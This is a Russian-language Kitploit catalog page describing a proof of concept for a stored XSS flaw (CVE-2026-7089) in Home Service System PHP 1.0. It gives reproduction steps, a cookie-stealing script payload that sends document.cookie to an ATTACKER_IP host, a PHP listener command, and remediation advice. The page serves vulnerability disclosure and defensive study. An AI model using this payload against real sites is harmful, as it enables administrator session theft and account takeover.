Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-7089-XSS — Доказательство концепции для CVE-2026-7089 — хранимой XSS-уязвимости в Home Service System PHP 1.0, позволяющей неавторизованному злоумышленнику перехватить сессию администратора через форму бронирования. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-7089-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

Доказательство концепции для CVE-2026-7089 — хранимой XSS-уязвимости в Home Service System PHP 1.0, позволяющей неавторизованному злоумышленнику перехватить сессию администратора через форму бронирования.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

home-service-system-unauth-stored-xss-admin-takeover

Сведения об уязвимости

ПолеДетали
Поставщикcode-projects.org
ПродуктHome Service System In PHP
Версия1.0
Тип уязвимостиМежсайтовый скриптинг с сохранением (Stored XSS)
CWECWE-79
Требуется аутентификацияНет
АвторImad Alvi

Описание

Уязвимость межсайтового скриптинга с сохранением (Stored XSS) существует в файле booking.php системы Home Service System In PHP 1.0. Неаутентифицированные пользователи могут внедрять вредоносные JavaScript-нагрузки через поля формы бронирования. Несанитизированный ввод сохраняется в базе данных и отображается без кодирования вывода в панели администратора (admin.php), где он выполняется в контексте браузера администратора.

Это позволяет неаутентифицированному злоумышленнику похитить cookie сессии администратора, выполнять действия от имени администратора или полностью скомпрометировать учётную запись администратора.


Затронутый компонент

  • Файл: booking.php
  • Параметры: fname, lname
  • Точка выполнения: admin.php → Управление бронированиями

Шаги воспроизведения

  1. Перейдите на страницу бронирования как неаутентифицированный пользователь: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. В поле Имя внедрите следующую нагрузку:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. Заполните остальные поля любыми допустимыми данными и отправьте бронирование.

  2. Запустите прослушиватель на машине злоумышленника:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. Дождитесь, пока администратор посетит раздел «Управление бронированиями» в admin.php.

  2. Нагрузка выполняется в браузере администратора, передавая cookie сессии на ваш прослушиватель.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

Доказательство концепции

Нагрузка (Предупреждение)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

Нагрузка (Перехват сессии)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

Воздействие

Эта уязвимость позволяет удалённому неаутентифицированному злоумышленнику полностью скомпрометировать приложение.

Злоумышленник может:

  • Выполнять произвольный JavaScript в браузере администратора
  • Похитить cookie сессии администратора PHPSESSID
  • Перехватить сессию администратора и получить полный административный доступ
  • Выполнять любые административные действия (управление бронированиями, поставщиками и т. д.)

Это приводит к полной компрометации приложения.

Устранение

  • Применяйте htmlspecialchars() с ENT_QUOTES ко всем вводимым пользователем данным перед сохранением или отображением
  • Внедрите заголовок политики безопасности контента (CSP)
  • Проверяйте и санитизируйте все входные данные форм на стороне сервера

Ссылки

  • Home Service System In PHP - code-projects.org
Скачать инструмент